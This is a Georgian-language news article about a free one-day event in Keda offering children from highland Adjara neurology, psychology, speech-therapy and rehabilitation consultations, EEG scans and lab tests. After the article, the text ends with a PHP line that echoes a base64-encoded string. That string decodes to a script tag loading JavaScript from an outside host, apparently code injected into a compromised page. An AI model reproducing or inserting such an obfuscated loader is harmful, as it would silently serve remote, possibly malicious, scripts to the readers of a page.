celsiusi
ავერსი საქკაბელი

მაღალმთიან აჭარაში მცხოვრებ ბავშვებს ოთხი პროფილის ექიმთან კონსულტაცია, თავის ტვინის ფუნქციური მდგომარეობის გამოკვლევა და სამი სახის ლაბორატორიული კვლევა უფასოდ ჩაუტარდებათ.


„ირმა ხვიჩიას რეაბილიტაციის ცენტრის“ ინიციატივითა და „მედიქალ ვორლდის ლაბორატორიის“ მხარდაჭერით, 29 ივნისს, მაღალმთიანი აჭარის მოსახლეობა ერთდღიანი აქციით ისარგებლებს.


კერძოდ, 0-დან 18 წლამდე ასაკის მქონე ყველა პირისთვის უფასო კონსულტაციებს ჩაატარებენ შემდეგი პროფილის ექიმები: ნევროლოგი, კლინიკური ფსიქოლოგი, ლოგოპედი და რეაბილიტოლოგი. ასევე უფასო იქნება თავის ტვინის ვიდეო ეეგ გამოკვლევა (ენცეფალოგრამა).
„მედიქალ ვორლდის ლაბორატორია“ კი ამავე ასაკობრივ ჯგუფს უსასყიდლოდ ჩაუტარებს რკინის, TSH-ისა და სისხლის საერთო ანალიზის კვლევას. ამასთან, 50%-მდე ფასდაკლება გავრცელდება სხვა ნებისმიერ ლაბორატორიულ კვლევაზე.


ერთდღიანი აქცია ქედაში, შოთა რუსთაველის ქ. N7-ში, 12:00-დან 17:00 საათამდე გაიმართება. აქციით სარგებლობისთვის მხოლოდ პირადობის დამადასტურებელი დოკუმენტის ქონაა საჭირო.


„ქედაში რამდენიმე წელია წარმატებით ფუნქციონირებს „ირმა ხვიჩიას რეაბილიტაციის ცენტრი“. ამჯერად პრიორიტეტი მაღალმთიან აჭარაში სამედიცინო სერვისებზე ხელმისაწვდომობის გაზრდაა.


პაციენტების საჭიროებებზე მორგებული თანამედროვე სამედიცინო სერვისების დანერგვა, განვითარება და მიწოდება მნიშვნელოვანია ყველა სამედიცინო დაწესებულების ბენეფიციარისთვის, ამ პროცესებში კი „მედიქალ ვორლდის ლაბორატორია“ უკვე მეორედ გვეხმარება.


ჩვენ ერთად ვქმნით ადამიანებისთვის უკეთეს მომავალს, ვერთიანდებით, რათა სამედიცინო სერვისებზე ხელმისაწვდომობა გაიზარდოს“, - აღნიშნა ცენტრის კლინიკურმა დირექტორმა, ნევროლოგმა ირმა ხვიჩიამ.


„მაღალმთიან რეგიონებში სამედიცინო სერვისების ნაკლებობაა, ამიტომ „მედიქალ ვორლდის ლაბორატორია“ მზად არის, მხარი დაუჭიროს ყველა წამოწყებას, რაც ადამიანებს ჯანმრთელობაზე ზრუნვის საშუალებას აძლევს.


ლაბორატორიის ფილიალები უკვე გავხსენით ქვეყნის 14 ქალაქში, მათ შორის, მაღალმთიან რეგიონებში და მოქალაქეებს საშუალება მივეცით 1000-ზე მეტი დასახელების კვლევა ადგილზევე ჩაიტარონ. კომპანიის მიზანია, საერთაშორისო სტანდარტების ლაბორატორიული სერვისები საქართველოს ყველა რეგიონში იყოს ხელმისაწვდომი“, - განაცხადა „მედიქალ ვორლდის ლაბორატორიის“ დამფუძნებელმა ლევან ქობალიამ.


შეგახსენებთ, „ირმა ხვიჩიას რეაბილიტაციის ცენტრი“ სამედიცინო რეაბილიტაციის მრავალპროფილური კლინიკაა, რომელიც ორიენტირებულია ბავშვთა/მოზრდილთა ნევროლოგიური, ინტელექტუალური და მენტალური დარღვევების მართვაზე.


რაც შეეხება „მედიქალ ვორლდის ლაბორატორიას“, კომპანია საქართველოში 2017 წელს დაფუძნდა, რომელიც უმაღლესი ხარისხის, მსოფლიოს წამყვანი ბრენდების ავტომატიზებული ანალიზატორებითა და რეაგენტებითაა აღჭურვილი. ამასთან, ლაბორატორია დაკომპლექტებულია მაღალკვალიფიციური კადრებით, რაც უზრუნველყოფს ანალიზების სიზუსტესა და ხარისხს.


„მედიქალ ვორლდის ლაბორატორია“ საქართველოში ერთ-ერთი დიდი ქსელური ლაბორატორიაა. კომპანიის ფილიალები ქვეყნის 14 ქალაქშია წარმოდგენილი, სადაც ადგილობრივ მოსახლეობას 1000-ზე მეტი დასახელების კვლევის ჩატარება შეუძლია. მათ შორის, გენეტიკური და ონკოლოგიური კვლევების, რისთვისაც ნიმუშები თურქეთისა და გერმანიის პარტნიორ ლაბორატორიებში იგზავნება.

200
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");